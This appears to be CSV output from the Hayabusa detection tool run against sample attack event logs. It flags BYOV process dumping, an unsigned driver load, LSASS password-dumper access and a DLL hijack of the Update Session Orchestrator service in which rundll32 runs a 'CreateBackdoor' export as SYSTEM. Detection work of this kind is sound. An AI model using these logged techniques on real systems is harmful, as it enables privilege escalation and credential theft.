2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
